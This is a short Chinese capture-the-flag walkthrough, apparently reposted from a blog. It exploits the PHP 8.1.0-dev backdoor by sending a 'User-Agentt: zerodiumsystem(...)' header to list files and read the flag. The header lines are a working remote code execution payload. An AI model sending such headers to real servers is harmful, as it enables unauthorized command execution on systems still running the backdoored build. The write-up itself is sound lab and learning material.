首先进入靶场如下 按照习惯,BP先抓一波包 结合题目说的 题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。 于是想到伪协议操作一下 发送给reapter 发现伪协议 嗯 不得行 不过 响应包有个东西引起注
首先进入靶场如下
按照习惯,BP先抓一波包
结合题目说的 题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
于是想到伪协议操作一下
发送给reapter
发现伪协议 嗯 不得行
不过 响应包有个东西引起注意
百度
发现 好家伙 这里有东西
这家伙 有漏洞可以用
在Connection 字段下面加上
User-Agentt:zerodiumsystem("ls /");
注意 zerodium后面拼接函数
发送
好家伙!
有东西
然后
替换成这个User-Agentt:zerodiumsystem("cat /flag");
提交 就完事儿了
来源地址:https://blog.csdn.net/weixin_69830800/article/details/127874564
--结束END--
本文标题: 青少年CTF、PHP的后门、PHP/8.1.0-dev漏洞
本文链接: https://lsjlt.com/news/421581.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0